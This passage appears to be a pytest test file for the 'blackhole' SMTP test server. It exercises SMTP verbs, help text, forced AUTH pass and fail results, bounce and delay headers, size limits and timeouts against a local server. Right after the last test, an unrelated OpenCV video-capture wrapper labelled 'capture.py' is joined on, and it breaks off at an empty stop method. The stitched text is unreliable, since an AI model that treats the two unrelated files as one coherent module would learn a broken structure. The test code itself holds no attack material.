# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import asyncio
import inspect
import random
import socket
import string
import threading
import time
import unittest
from smtplib import SMTP, SMTPNotSupportedError, SMTPServerDisconnected
from unittest import mock
import pytest
from blackhole.config import Config
from blackhole.control import _socket
from blackhole.smtp import Smtp
from ._utils import ( # noqa: F401; isort:skip
Args,
cleandir,
create_config,
create_file,
reset,
)
# Prefer uvloop's faster event loop implementation when it is installed;
# fall back silently to the stdlib asyncio loop otherwise.
try:
    import uvloop

    asyncio.set_event_loop_policy(uvloop.EventLoopPolicy())
except ImportError:
    pass
@pytest.mark.usefixtures("reset", "cleandir")
def test_initiation():
    """Smtp derives its FQDN from socket.getfqdn at construction time."""
    config_file = create_config(("",))
    access_patch = mock.patch("os.access", return_value=False)
    fqdn_patch = mock.patch(
        "socket.getfqdn",
        return_value="a.blackhole.io",
    )
    with access_patch, fqdn_patch:
        config = Config(config_file)
        config.load()
        server = Smtp([])
        assert server.fqdn == "a.blackhole.io"
@pytest.mark.usefixtures("reset", "cleandir")
def test_auth_mechanisms():
    """The server advertises exactly the three supported AUTH mechanisms."""
    server = Smtp([])
    expected = ["CRAM-MD5", "LOGIN", "PLAIN"]
    assert server.get_auth_members() == expected
@pytest.mark.usefixtures("reset", "cleandir")
def test_handler_lookup():
    """Every SMTP verb, HELP topic, and AUTH mechanism resolves to its
    handler; unrecognised input falls back to the *_UNKNOWN handlers.

    (Removed a duplicated STARTTLS assertion that checked the same lookup
    twice.)
    """
    smtp = Smtp([])
    # AUTH mechanism dispatch, including the unknown-mechanism fallback.
    assert smtp.lookup_handler("AUTH CRAM-MD5") == smtp.auth_CRAM_MD5
    assert smtp.lookup_handler("AUTH LOGIN") == smtp.auth_LOGIN
    assert smtp.lookup_handler("AUTH PLAIN") == smtp.auth_PLAIN
    assert smtp.lookup_handler("AUTH") == smtp.auth_UNKNOWN
    assert smtp.lookup_handler("AUTH KURA") == smtp.auth_UNKNOWN
    # Core verb dispatch.
    assert smtp.lookup_handler("HELP") == smtp.do_HELP
    assert smtp.lookup_handler("DATA") == smtp.do_DATA
    assert smtp.lookup_handler("EHLO") == smtp.do_EHLO
    assert smtp.lookup_handler("ETRN") == smtp.do_ETRN
    assert smtp.lookup_handler("EXPN") == smtp.do_EXPN
    assert smtp.lookup_handler("HELO") == smtp.do_HELO
    assert smtp.lookup_handler("MAIL") == smtp.do_MAIL
    assert smtp.lookup_handler("NOOP") == smtp.do_NOOP
    assert smtp.lookup_handler("QUIT") == smtp.do_QUIT
    assert smtp.lookup_handler("RCPT") == smtp.do_RCPT
    assert smtp.lookup_handler("RSET") == smtp.do_RSET
    assert smtp.lookup_handler("VRFY") == smtp.do_VRFY
    assert smtp.lookup_handler("STARTTLS") == smtp.do_STARTTLS
    assert smtp.lookup_handler("KURA") == smtp.do_UNKNOWN
    assert smtp.lookup_handler("") == smtp.do_UNKNOWN
    # HELP topic dispatch, including the unknown-topic fallback.
    assert smtp.lookup_handler("HELP DATA") == smtp.help_DATA
    assert smtp.lookup_handler("HELP EHLO") == smtp.help_EHLO
    assert smtp.lookup_handler("HELP ETRN") == smtp.help_ETRN
    assert smtp.lookup_handler("HELP EXPN") == smtp.help_EXPN
    assert smtp.lookup_handler("HELP HELO") == smtp.help_HELO
    assert smtp.lookup_handler("HELP MAIL") == smtp.help_MAIL
    assert smtp.lookup_handler("HELP NOOP") == smtp.help_NOOP
    assert smtp.lookup_handler("HELP QUIT") == smtp.help_QUIT
    assert smtp.lookup_handler("HELP RCPT") == smtp.help_RCPT
    assert smtp.lookup_handler("HELP RSET") == smtp.help_RSET
    assert smtp.lookup_handler("HELP VRFY") == smtp.help_VRFY
    assert smtp.lookup_handler("HELP KURA") == smtp.help_UNKNOWN
@pytest.mark.usefixtures("reset", "cleandir")
def test_unknown_handlers():
    """Guard against adding/removing handler methods without updating tests.

    Any method whose name starts with a handler prefix must appear in the
    corresponding known-names list.
    """
    expected = {
        "do_": [
            "do_DATA",
            "do_EHLO",
            "do_ETRN",
            "do_EXPN",
            "do_HELO",
            "do_HELP",
            "do_MAIL",
            "do_NOOP",
            "do_NOT_IMPLEMENTED",
            "do_QUIT",
            "do_RCPT",
            "do_RSET",
            "do_STARTTLS",
            "do_UNKNOWN",
            "do_VRFY",
        ],
        "help_": [
            "help_AUTH",
            "help_DATA",
            "help_EHLO",
            "help_ETRN",
            "help_EXPN",
            "help_HELO",
            "help_MAIL",
            "help_NOOP",
            "help_QUIT",
            "help_RCPT",
            "help_RSET",
            "help_UNKNOWN",
            "help_VRFY",
        ],
        "auth_": ["auth_CRAM_MD5", "auth_LOGIN", "auth_PLAIN", "auth_UNKNOWN"],
    }
    server = Smtp([])
    for name, _ in inspect.getmembers(server, inspect.ismethod):
        for prefix, known in expected.items():
            if name.startswith(prefix):
                assert name in known
# NOTE(review): ``usefixtures`` on a plain helper class (not a test class)
# has no effect in pytest — presumably copy/paste from the tests; confirm
# before relying on these fixtures here.
@pytest.mark.usefixtures("reset", "cleandir")
class Controller:
    """Runs a blackhole Smtp server on a dedicated background thread.

    The thread owns its own asyncio event loop; ``start()`` blocks until
    the server is accepting connections and ``stop()`` tears everything
    down and joins the thread.
    """
    def __init__(self, sock=None):
        # Bind an ephemeral local port unless the caller supplies a socket.
        if sock is not None:
            self.sock = sock
        else:
            self.sock = _socket("127.0.0.1", 0, socket.AF_INET)
        self.loop = asyncio.new_event_loop()
        self.server = None
        self._thread = None

    def _run(self, ready_event):
        # Thread target: owns the event loop for the server's lifetime.
        asyncio.set_event_loop(self.loop)
        conf = Config(None)
        # presumably Config is shared state the Smtp instances read —
        # confirm; `conf` itself is not referenced again here.
        conf.mailname = "blackhole.io"
        _server = self.loop.create_server(lambda: Smtp([]), sock=self.sock)
        self.server = self.loop.run_until_complete(_server)
        # Signal start() once the loop is running and the server is up.
        self.loop.call_soon(ready_event.set)
        self.loop.run_forever()
        # Reached after _stop(): shut the server down cleanly.
        self.server.close()
        self.loop.run_until_complete(self.server.wait_closed())
        self.loop.close()
        self.server = None

    def start(self):
        ready_event = threading.Event()
        self._thread = threading.Thread(target=self._run, args=(ready_event,))
        self._thread.daemon = True
        self._thread.start()
        # Block until the server thread reports readiness.
        ready_event.wait()

    def stop(self):
        assert self._thread is not None, "SMTP daemon not running"
        # _stop must run on the loop's own thread.
        self.loop.call_soon_threadsafe(self._stop)
        self._thread.join()
        self._thread = None

    def _stop(self):
        self.loop.stop()
        for task in asyncio.all_tasks(self.loop):
            task.cancel()
@pytest.mark.usefixtures("reset", "cleandir")
@pytest.mark.asyncio
async def test_mode_directive(event_loop, unused_tcp_port):
    """A listener-level ``mode=bounce`` overrides the message headers.

    The message asks for accept + 5s delay, but the bounce codes and the
    ~0s round-trip assertions show listener flags win over both headers.
    """
    cfile = create_config(("listen=:{} mode=bounce".format(unused_tcp_port),))
    conf = Config(cfile).load()
    sock = _socket("127.0.0.1", unused_tcp_port, socket.AF_INET)
    controller = Controller(sock)
    controller.start()
    # Apply the per-listener flags for the port the server is bound to.
    conf.flags_from_listener("127.0.0.1", unused_tcp_port)
    host, port = sock.getsockname()
    with SMTP(host, port) as client:
        msg = [
            "From: kura@example.com",
            "To: kura@example.com",
            "Subject: Test",
            "X-Blackhole-Mode: accept",
            "X-Blackhole-Delay: 5",
            "",
            "Testing 1, 2, 3",
        ]
        msg = "\n".join(msg)
        start = time.time()
        code, resp = client.data(msg.encode("utf-8"))
        stop = time.time()
        # Bounce replies come from the rejection-code pool.
        assert code in [450, 451, 452, 458, 521, 550, 551, 552, 553, 571]
        assert round(stop - start) in (0, 1)
    controller.stop()
@pytest.mark.usefixtures("reset", "cleandir")
@pytest.mark.asyncio
@pytest.mark.slow
async def test_delay_directive(event_loop, unused_tcp_port):
    """A listener-level ``delay=5`` overrides the message headers.

    The headers ask for bounce + 30s delay, yet the test asserts 250 and a
    ~5s round trip — NOTE(review): this suggests listener flags disable
    header processing entirely; confirm against the server implementation.
    """
    cfile = create_config(("listen=:{} delay=5".format(unused_tcp_port),))
    conf = Config(cfile).load()
    sock = _socket("127.0.0.1", unused_tcp_port, socket.AF_INET)
    controller = Controller(sock)
    controller.start()
    conf.flags_from_listener("127.0.0.1", unused_tcp_port)
    host, port = sock.getsockname()
    with SMTP(host, port) as client:
        msg = [
            "From: kura@example.com",
            "To: kura@example.com",
            "Subject: Test",
            "X-Blackhole-Mode: bounce",
            "X-Blackhole-Delay: 30",
            "",
            "Testing 1, 2, 3",
        ]
        msg = "\n".join(msg)
        start = time.time()
        code, resp = client.data(msg.encode("utf-8"))
        stop = time.time()
        assert code == 250
        # Allow one second of scheduling slack either side of the 5s delay.
        assert round(stop - start) in (4, 5, 6)
    controller.stop()
@pytest.mark.usefixtures("reset", "cleandir")
@pytest.mark.asyncio
@pytest.mark.slow
async def test_mode_and_delay_directive(event_loop, unused_tcp_port):
    """Combined listener flags ``delay=5 mode=bounce`` override headers.

    The headers request accept + 30s delay; the assertions expect a bounce
    code after roughly the listener's 5 seconds.
    """
    cfile = create_config(
        ("listen=:{} delay=5 mode=bounce".format(unused_tcp_port),),
    )
    conf = Config(cfile).load()
    sock = _socket("127.0.0.1", unused_tcp_port, socket.AF_INET)
    controller = Controller(sock)
    controller.start()
    conf.flags_from_listener("127.0.0.1", unused_tcp_port)
    host, port = sock.getsockname()
    with SMTP(host, port) as client:
        msg = [
            "From: kura@example.com",
            "To: kura@example.com",
            "Subject: Test",
            "X-Blackhole-Mode: accept",
            "X-Blackhole-Delay: 30",
            "",
            "Testing 1, 2, 3",
        ]
        msg = "\n".join(msg)
        start = time.time()
        code, resp = client.data(msg.encode("utf-8"))
        stop = time.time()
        assert code in [450, 451, 452, 458, 521, 550, 551, 552, 553, 571]
        # Allow one second of scheduling slack either side of the 5s delay.
        assert round(stop - start) in (4, 5, 6)
    controller.stop()
@pytest.mark.usefixtures("reset", "cleandir")
@pytest.mark.asyncio
@pytest.mark.slow
async def test_timeout(event_loop):
    """An idle client receives ``421 Timeout`` after ``timeout=5``.

    The test idles for 8 seconds (comfortably past the 5s timeout) and
    checks that the next command is answered with the timeout reply.
    """
    cfile = create_config(("timeout=5",))
    Config(cfile).load()
    controller = Controller()
    controller.start()
    host, port = controller.sock.getsockname()
    with SMTP(host, port) as client:
        await asyncio.sleep(8)
        code, resp = client.helo("example.com")
        assert code == 421
        assert resp == b"Timeout"
    controller.stop()
@pytest.mark.usefixtures("reset", "cleandir")
@pytest.mark.asyncio
@pytest.mark.slow
async def test_delay(event_loop):
    """``X-Blackhole-Delay: 5`` postpones the (accepted) DATA reply ~5s."""
    cfile = create_config(("timeout=10",))
    Config(cfile).load()
    controller = Controller()
    controller.start()
    host, port = controller.sock.getsockname()
    with SMTP(host, port) as client:
        msg = [
            "From: kura@example.com",
            "To: kura@example.com",
            "Subject: Test",
            "X-Blackhole-Mode: accept",
            "X-Blackhole-Delay: 5",
            "",
            "Testing 1, 2, 3",
        ]
        msg = "\n".join(msg)
        start = time.time()
        code, resp = client.data(msg.encode("utf-8"))
        stop = time.time()
        assert code == 250
        assert resp.startswith(b"2.0.0 OK: queued as")
        # Allow one second of scheduling slack either side of the delay.
        assert round(stop - start) in (4, 5, 6)
    controller.stop()
@pytest.mark.usefixtures("reset", "cleandir")
@pytest.mark.asyncio
@pytest.mark.slow
async def test_delayed_bounce(event_loop):
    """``X-Blackhole-Mode: bounce`` with a 5s delay rejects after ~5s."""
    cfile = create_config(("timeout=10",))
    Config(cfile).load()
    controller = Controller()
    controller.start()
    host, port = controller.sock.getsockname()
    with SMTP(host, port) as client:
        msg = [
            "From: kura@example.com",
            "To: kura@example.com",
            "Subject: Test",
            "X-Blackhole-Mode: bounce",
            "X-Blackhole-Delay: 5",
            "",
            "Testing 1, 2, 3",
        ]
        msg = "\n".join(msg)
        start = time.time()
        code, resp = client.data(msg.encode("utf-8"))
        stop = time.time()
        # Bounce replies come from the rejection-code pool.
        assert code in [450, 451, 452, 458, 521, 550, 551, 552, 553, 571]
        assert round(stop - start) in (4, 5, 6)
    controller.stop()
@pytest.mark.usefixtures("reset", "cleandir")
@pytest.mark.asyncio
@pytest.mark.slow
async def test_delay_range(event_loop):
    """``X-Blackhole-Delay: 2, 4`` delays by a value within the range."""
    cfile = create_config(("timeout=10",))
    Config(cfile).load()
    controller = Controller()
    controller.start()
    host, port = controller.sock.getsockname()
    with SMTP(host, port) as client:
        msg = [
            "From: kura@example.com",
            "To: kura@example.com",
            "Subject: Test",
            "X-Blackhole-Mode: accept",
            "X-Blackhole-Delay: 2, 4",
            "",
            "Testing 1, 2, 3",
        ]
        msg = "\n".join(msg)
        start = time.time()
        code, resp = client.data(msg.encode("utf-8"))
        stop = time.time()
        assert code == 250
        assert resp.startswith(b"2.0.0 OK: queued as")
        # The observed delay must round into the configured 2–4s window.
        assert round(stop - start) in (2, 3, 4)
    controller.stop()
@pytest.mark.usefixtures("reset", "cleandir")
class TestSmtp(unittest.TestCase):
    """End-to-end SMTP protocol tests against a live blackhole server.

    ``setUp`` starts one server (timeout=5, max_message_size=1024) per test
    and registers its shutdown as cleanup.  Each test opens a fresh
    ``smtplib.SMTP`` session against it.

    Fixes applied: ``test_auth_plain_pass`` and
    ``test_auth_plain_pass_oneline`` previously opened two nested SMTP
    connections, with the inner ``client`` shadowing the outer one; the
    redundant outer connection has been removed.
    """

    def setUp(self):
        cfile = create_config(("timeout=5", "max_message_size=1024"))
        Config(cfile).load()
        controller = Controller()
        controller.start()
        self.host, self.port = controller.sock.getsockname()
        # Ensure the server thread is stopped even if the test fails.
        self.addCleanup(controller.stop)

    def test_helo(self):
        with SMTP(self.host, self.port) as client:
            code, resp = client.helo("example.com")
            assert code == 250
            assert resp == b"OK"

    def test_ehlo(self):
        """EHLO advertises the full extension list, in server order."""
        with SMTP(self.host, self.port) as client:
            code, resp = client.ehlo("example.com")
            assert code == 250
            eresp = (
                "blackhole.io",
                "HELP",
                "PIPELINING",
                "AUTH CRAM-MD5 LOGIN PLAIN",
                "SIZE 1024",
                "VRFY",
                "ETRN",
                "ENHANCEDSTATUSCODES",
                "8BITMIME",
                "SMTPUTF8",
                "EXPN",
                "DSN",
            )
            assert resp == "\n".join(eresp).encode("utf-8")

    def test_mail(self):
        with SMTP(self.host, self.port) as client:
            code, resp = client.mail("kura@example.com")
            assert code == 250
            assert resp == b"2.1.0 OK"

    def test_mail_size_ok(self):
        with SMTP(self.host, self.port) as client:
            code, resp = client.mail("kura@example.com SIZE=1")
            assert code == 250
            assert resp == b"2.1.0 OK"

    def test_mail_size_ok_and_mime(self):
        """SIZE within the limit is accepted alongside each MIME option."""
        with SMTP(self.host, self.port) as client:
            code, resp = client.mail("kura@example.com SMTPUTF8 SIZE=1024")
            assert code == 250
            assert resp == b"2.1.0 OK"
        with SMTP(self.host, self.port) as client:
            code, resp = client.mail("kura@example.com BODY=7BIT SIZE=1024")
            assert code == 250
            assert resp == b"2.1.0 OK"
        with SMTP(self.host, self.port) as client:
            code, resp = client.mail(
                "kura@example.com BODY=8BITMIME SIZE=1024",
            )
            assert code == 250
            assert resp == b"2.1.0 OK"

    def test_mail_size_too_large(self):
        with SMTP(self.host, self.port) as client:
            msg = "MAIL FROM: kura@example.com SIZE=10240"
            code, resp = client.docmd(msg)
            assert code == 552
            assert resp == b"Message size exceeds fixed maximum message size"

    def test_mail_size_too_large_and_mime(self):
        """SIZE over the limit is rejected regardless of MIME options."""
        with SMTP(self.host, self.port) as client:
            msg = "MAIL FROM: kura@example.com SMTPUTF8 SIZE=10240"
            code, resp = client.docmd(msg)
            assert code == 552
            assert resp == b"Message size exceeds fixed maximum message size"
        with SMTP(self.host, self.port) as client:
            msg = "MAIL FROM: kura@example.com BODY=7BIT SIZE=10240"
            code, resp = client.docmd(msg)
            assert code == 552
            assert resp == b"Message size exceeds fixed maximum message size"
        with SMTP(self.host, self.port) as client:
            msg = "MAIL FROM: kura@example.com BODY=8BITMIME SIZE=10240"
            code, resp = client.docmd(msg)
            assert code == 552
            assert resp == b"Message size exceeds fixed maximum message size"

    def test_mail_smtputf8(self):
        with SMTP(self.host, self.port) as client:
            code, resp = client.docmd("MAIL FROM: kura@example.com SMTPUTF8")
            assert code == 250
            assert resp == b"2.1.0 OK"

    def test_mail_7bit(self):
        with SMTP(self.host, self.port) as client:
            code, resp = client.docmd("MAIL FROM: kura@example.com BODY=7BIT")
            assert code == 250
            assert resp == b"2.1.0 OK"

    def test_mail_8bitmime(self):
        with SMTP(self.host, self.port) as client:
            msg = "MAIL FROM: kura@example.com BODY=8BITMIME"
            code, resp = client.docmd(msg)
            assert code == 250
            assert resp == b"2.1.0 OK"

    def test_rcpt(self):
        with SMTP(self.host, self.port) as client:
            code, resp = client.rcpt("kura@example.com")
            assert code == 250
            assert resp == b"2.1.5 OK"

    def test_data(self):
        with SMTP(self.host, self.port) as client:
            code, resp = client.data(b"testing 1, 2, 3")
            assert code == 250
            assert resp.startswith(b"2.0.0 OK: queued as")

    def test_data_too_large(self):
        """A 2048-byte body exceeds max_message_size=1024 and is rejected."""
        with SMTP(self.host, self.port) as client:
            msg = "".join(
                random.choice(string.ascii_letters + string.digits)
                for x in range(2048)
            )
            code, resp = client.data(msg)
            assert code == 552
            assert resp == b"Message size exceeds fixed maximum message size"

    def test_data_fail(self):
        """X-Blackhole-Mode: bounce forces a rejection code for DATA."""
        with SMTP(self.host, self.port) as client:
            msg = [
                "From: kura@example.com",
                "To: kura@example.com",
                "Subject: Test",
                "X-Blackhole-Mode: bounce",
                "",
                "Testing 1, 2, 3",
            ]
            msg = "\n".join(msg)
            code, resp = client.data(msg.encode("utf-8"))
            assert code in [450, 451, 452, 458, 521, 550, 551, 552, 553, 571]

    def test_data_random(self):
        """X-Blackhole-Mode: random may accept (250) or bounce."""
        with SMTP(self.host, self.port) as client:
            msg = [
                "From: kura@example.com",
                "To: kura@example.com",
                "Subject: Test",
                "X-Blackhole-Mode: random",
                "",
                "Testing 1, 2, 3",
            ]
            msg = "\n".join(msg)
            code, resp = client.data(msg.encode("utf-8"))
            assert code in [
                250,
                450,
                451,
                452,
                458,
                521,
                550,
                551,
                552,
                553,
                571,
            ]

    def test_data_accept(self):
        with SMTP(self.host, self.port) as client:
            msg = [
                "From: kura@example.com",
                "To: kura@example.com",
                "Subject: Test",
                "X-Blackhole-Mode: accept",
                "",
                "Testing 1, 2, 3",
            ]
            msg = "\n".join(msg)
            code, resp = client.data(msg.encode("utf-8"))
            assert code == 250
            assert resp.startswith(b"2.0.0 OK: queued as")

    def test_rset(self):
        with SMTP(self.host, self.port) as client:
            code, resp = client.rset()
            assert code == 250
            assert resp == b"2.0.0 OK"

    def test_noop(self):
        with SMTP(self.host, self.port) as client:
            code, resp = client.noop()
            assert code == 250
            assert resp == b"2.0.0 OK"

    def test_vrfy(self):
        with SMTP(self.host, self.port) as client:
            code, resp = client.verify("kura@example.com")
            assert code == 252
            assert resp == b"2.0.0 Will attempt delivery"

    def test_vrfy_pass(self):
        """A 'pass=' address forces VRFY to report the mailbox as known."""
        with SMTP(self.host, self.port) as client:
            code, resp = client.verify("pass=kura@example.com")
            assert code == 250
            assert resp == b"2.0.0 <pass=kura@example.com> OK"

    def test_vrfy_fail(self):
        """A 'fail=' address forces VRFY to report the mailbox as unknown."""
        with SMTP(self.host, self.port) as client:
            code, resp = client.verify("fail=kura@example.com")
            assert code == 550
            assert resp == b"5.7.1 <fail=kura@example.com> unknown"

    def test_expn_no_list(self):
        with SMTP(self.host, self.port) as client:
            code, resp = client.expn("")
            assert code == 550
            assert resp == b"Not authorised"

    def test_expn_fail(self):
        with SMTP(self.host, self.port) as client:
            code, resp = client.expn("fail=kura@example.com")
            assert code == 550
            assert resp == b"Not authorised"

    def test_expn_list1(self):
        with SMTP(self.host, self.port) as client:
            code, resp = client.expn("list1")
            eresp = (
                "Shadow <shadow@blackhole.io>",
                "Wednesday <wednesday@blackhole.io>",
                "Low-key Liesmith <low-key.liesmith@blackhole.io>",
            )
            assert code == 250
            assert resp == "\n".join(eresp).encode("utf-8")

    def test_expn_list2(self):
        with SMTP(self.host, self.port) as client:
            code, resp = client.expn("list2")
            eresp = (
                "Jim Holden <jim.holden@blackhole.io>",
                "Naomi Nagata <naomi.nagata@blackhole.io>",
                "Alex Kamal <alex.kamal@blackhole.io>",
                "Amos Burton <amos.burton@blackhole.io>",
            )
            assert code == 250
            assert resp == "\n".join(eresp).encode("utf-8")

    def test_expn_list3(self):
        with SMTP(self.host, self.port) as client:
            code, resp = client.expn("list3")
            eresp = (
                "Takeshi Kovacs <takeshi.kovacs@blackhole.io>",
                "Laurens Bancroft <laurens.bancroft@blackhole.io>",
                "Kristin Ortega <kristin.ortega@blackhole.io>",
                "Quellcrist Falconer <quellcrist.falconer@blackhole.io>",
                "Virginia Vidaura <virginia.vidaura@blackhole.io>",
                "Reileen Kawahara <reileen.kawahara@blackhole.io>",
            )
            assert code == 250
            assert resp == "\n".join(eresp).encode("utf-8")

    def test_expn_all(self):
        """EXPN all returns the union of the lists; order is not defined,
        so the comparison is done on sorted members."""
        with SMTP(self.host, self.port) as client:
            code, resp = client.expn("all")
            eresp = (
                "Takeshi Kovacs <takeshi.kovacs@blackhole.io>",
                "Laurens Bancroft <laurens.bancroft@blackhole.io>",
                "Kristin Ortega <kristin.ortega@blackhole.io>",
                "Quellcrist Falconer <quellcrist.falconer@blackhole.io>",
                "Virginia Vidaura <virginia.vidaura@blackhole.io>",
                "Reileen Kawahara <reileen.kawahara@blackhole.io>",
                "Jim Holden <jim.holden@blackhole.io>",
                "Naomi Nagata <naomi.nagata@blackhole.io>",
                "Alex Kamal <alex.kamal@blackhole.io>",
                "Amos Burton <amos.burton@blackhole.io>",
                "Shadow <shadow@blackhole.io>",
                "Wednesday <wednesday@blackhole.io>",
                "Low-key Liesmith <low-key.liesmith@blackhole.io>",
            )
            assert code == 250
            resps = resp.decode("utf-8").split("\n")
            assert sorted(resps) == sorted(eresp)

    def test_etrn(self):
        with SMTP(self.host, self.port) as client:
            code, resp = client.docmd("ETRN")
            assert code == 250
            assert resp == b"Queueing started"

    def test_quit(self):
        with SMTP(self.host, self.port) as client:
            code, resp = client.quit()
            assert code == 221
            assert resp == b"2.0.0 Goodbye"

    def test_starttls(self):
        """STARTTLS is advertised as unsupported: smtplib raises, and the
        raw command gets a 500."""
        with SMTP(self.host, self.port) as client:
            with pytest.raises(SMTPNotSupportedError):
                code, resp = client.starttls()
            code, resp = client.docmd("STARTTLS")
            assert code == 500
            assert resp == b"Not implemented"

    def test_unknown(self):
        with SMTP(self.host, self.port) as client:
            code, resp = client.docmd("KURA")
            assert code == 502
            assert resp == b"5.5.2 Command not recognised"

    def test_help(self):
        with SMTP(self.host, self.port) as client:
            eresp = (
                "Supported commands: AUTH DATA EHLO ETRN EXPN HELO MAIL "
                "NOOP QUIT RCPT RSET VRFY"
            )
            assert client.help() == eresp.encode("utf-8")

    def test_help_auth(self):
        with SMTP(self.host, self.port) as client:
            resp = client.help("AUTH")
            assert resp == b"Syntax: AUTH CRAM-MD5 LOGIN PLAIN"

    def test_help_data(self):
        with SMTP(self.host, self.port) as client:
            resp = client.help("DATA")
            assert resp == b"Syntax: DATA"

    def test_help_ehlo(self):
        with SMTP(self.host, self.port) as client:
            resp = client.help("EHLO")
            assert resp == b"Syntax: EHLO domain.tld"

    def test_help_etrn(self):
        with SMTP(self.host, self.port) as client:
            resp = client.help("ETRN")
            assert resp == b"Syntax: ETRN"

    def test_help_expn(self):
        with SMTP(self.host, self.port) as client:
            resp = client.help("EXPN")
            assert resp == b"Syntax: EXPN <list1 | list2 | list3 | all>"

    def test_help_helo(self):
        with SMTP(self.host, self.port) as client:
            resp = client.help("HELO")
            assert resp == b"Syntax: HELO domain.tld"

    def test_help_mail(self):
        with SMTP(self.host, self.port) as client:
            resp = client.help("MAIL")
            assert resp == b"Syntax: MAIL FROM: <address>"

    def test_help_noop(self):
        with SMTP(self.host, self.port) as client:
            resp = client.help("NOOP")
            assert resp == b"Syntax: NOOP"

    def test_help_quit(self):
        with SMTP(self.host, self.port) as client:
            resp = client.help("QUIT")
            assert resp == b"Syntax: QUIT"

    def test_help_rcpt(self):
        with SMTP(self.host, self.port) as client:
            resp = client.help("RCPT")
            assert resp == b"Syntax: RCPT TO: <address>"

    def test_help_rset(self):
        with SMTP(self.host, self.port) as client:
            resp = client.help("RSET")
            assert resp == b"Syntax: RSET"

    def test_help_unknown(self):
        """HELP for an unknown topic returns 501 plus the command list."""
        with SMTP(self.host, self.port) as client:
            code, resp = client.docmd("HELP", "KURA")
            eresp = (
                "Supported commands: AUTH DATA EHLO ETRN EXPN HELO MAIL "
                "NOOP QUIT RCPT RSET VRFY"
            )
            assert code == 501
            assert resp == eresp.encode("utf-8")

    def test_help_vrfy(self):
        with SMTP(self.host, self.port) as client:
            resp = client.help("VRFY")
            assert resp == b"Syntax: VRFY <address>"

    def test_auth_login(self):
        # 334 + base64("Username:") challenge, then any username succeeds.
        with SMTP(self.host, self.port) as client:
            code, resp = client.docmd("AUTH", "LOGIN")
            assert code == 334
            assert resp == b"VXNlcm5hbWU6"
            code, resp = client.docmd("test")
            assert code == 235
            assert resp == b"2.7.0 Authentication successful"

    def test_auth_login_fail(self):
        with SMTP(self.host, self.port) as client:
            code, resp = client.docmd("AUTH", "LOGIN")
            assert code == 334
            assert resp == b"VXNlcm5hbWU6"
            code, resp = client.docmd("fail=test")
            assert code == 535
            assert resp == b"5.7.8 Authentication failed"

    def test_auth_login_pass(self):
        with SMTP(self.host, self.port) as client:
            code, resp = client.docmd("AUTH", "LOGIN")
            assert code == 334
            assert resp == b"VXNlcm5hbWU6"
            code, resp = client.docmd("pass=test")
            assert code == 235
            assert resp == b"2.7.0 Authentication successful"

    def test_auth_cram_md5(self):
        with SMTP(self.host, self.port) as client:
            client.user = "test"
            client.password = "test"
            code, resp = client.auth("CRAM-MD5", client.auth_cram_md5)
            assert code == 235
            assert resp == b"2.7.0 Authentication successful"

    def test_auth_cram_md5_fail(self):
        with SMTP(self.host, self.port) as client:
            code, resp = client.docmd("AUTH", "CRAM-MD5")
            assert code == 334
            code, resp = client.docmd("fail=test")
            assert code == 535
            assert resp == b"5.7.8 Authentication failed"

    def test_auth_cram_md5_pass(self):
        with SMTP(self.host, self.port) as client:
            code, resp = client.docmd("AUTH", "CRAM-MD5")
            assert code == 334
            code, resp = client.docmd("pass=test")
            assert code == 235
            assert resp == b"2.7.0 Authentication successful"

    def test_auth_plain(self):
        with SMTP(self.host, self.port) as client:
            client.user = "test"
            client.password = "test"
            code, resp = client.auth("PLAIN", client.auth_plain)
            assert code == 235
            assert resp == b"2.7.0 Authentication successful"

    def test_auth_plain_fail(self):
        with SMTP(self.host, self.port) as client:
            code, resp = client.docmd("AUTH", "PLAIN")
            assert code == 334
            code, resp = client.docmd("fail=test")
            assert code == 535
            assert resp == b"5.7.8 Authentication failed"

    def test_auth_plain_pass(self):
        # Fixed: a redundant outer `with SMTP(...)` used to open a second,
        # unused connection here.
        with SMTP(self.host, self.port) as client:
            code, resp = client.docmd("AUTH", "PLAIN")
            assert code == 334
            code, resp = client.docmd("pass=test")
            assert code == 235
            assert resp == b"2.7.0 Authentication successful"

    def test_auth_plain_fail_oneline(self):
        with SMTP(self.host, self.port) as client:
            code, resp = client.docmd("AUTH", "PLAIN fail=test")
            assert code == 535
            assert resp == b"5.7.8 Authentication failed"

    def test_auth_plain_pass_oneline(self):
        # Fixed: a redundant outer `with SMTP(...)` used to open a second,
        # unused connection here.
        with SMTP(self.host, self.port) as client:
            code, resp = client.docmd("AUTH", "PLAIN pass=test")
            assert code == 235
            assert resp == b"2.7.0 Authentication successful"

    def test_auth_unknown(self):
        with SMTP(self.host, self.port) as client:
            code, resp = client.docmd("AUTH", "KURA")
            assert code == 501
            assert resp == b"5.5.4 Syntax: AUTH mechanism"

    def test_too_many_unknown_commands(self):
        """After repeated unknown commands the server gives 502 and drops
        the connection, which smtplib surfaces as SMTPServerDisconnected."""
        with SMTP(self.host, self.port) as client, pytest.raises(
            SMTPServerDisconnected,
        ):
            for _ in range(11):
                code, resp = client.docmd("KURA")
            assert code == 502
            assert resp == b"5.5.3 Too many unknown commands"
|
capture.py | import time
import cv2
from threading import Thread
class VideoCapture:
    """Iterable wrapper around ``cv2.VideoCapture``.

    A background thread continuously reads frames; the latest frame is
    exposed (channel-reversed, i.e. BGR -> RGB) via ``get_frame`` and the
    iterator protocol.

    Fixes: ``get_frame`` no longer raises ``AttributeError`` when no frame
    has arrived yet; the reader thread is a daemon so it cannot keep the
    process alive; ``start`` can be called again after the previous reader
    thread finished (Thread objects are single-use).
    """

    def __init__(self, src):
        self.frame = None  # latest frame (RGB), None until the first read
        self.src = src
        self.capture = cv2.VideoCapture(src)
        self.thread = Thread(target=self._read_frames)
        self.thread.daemon = True

    def __iter__(self):
        self.start()
        time.sleep(3)  # give the reader thread time to grab a first frame
        return self

    def __next__(self):
        frame = self.get_frame()
        if frame is None:
            raise StopIteration
        return frame

    def _read_frames(self):
        # Runs on the background thread until the stream ends or the
        # capture is released (read() then returns ret=False).
        while True:
            ret, frame = self.capture.read()
            if not ret:
                break
            # OpenCV yields BGR; reverse the channel axis to get RGB.
            self.frame = frame[:, :, ::-1]

    def start(self):
        """(Re)open the capture if needed and ensure the reader is running."""
        if not self.capture.isOpened():
            self.capture = cv2.VideoCapture(self.src)
        if not self.thread.is_alive():
            try:
                self.thread.start()
            except RuntimeError:
                # The previous thread already ran to completion; threads
                # are single-use, so create a fresh one.
                self.thread = Thread(target=self._read_frames)
                self.thread.daemon = True
                self.thread.start()

    def stop(self):
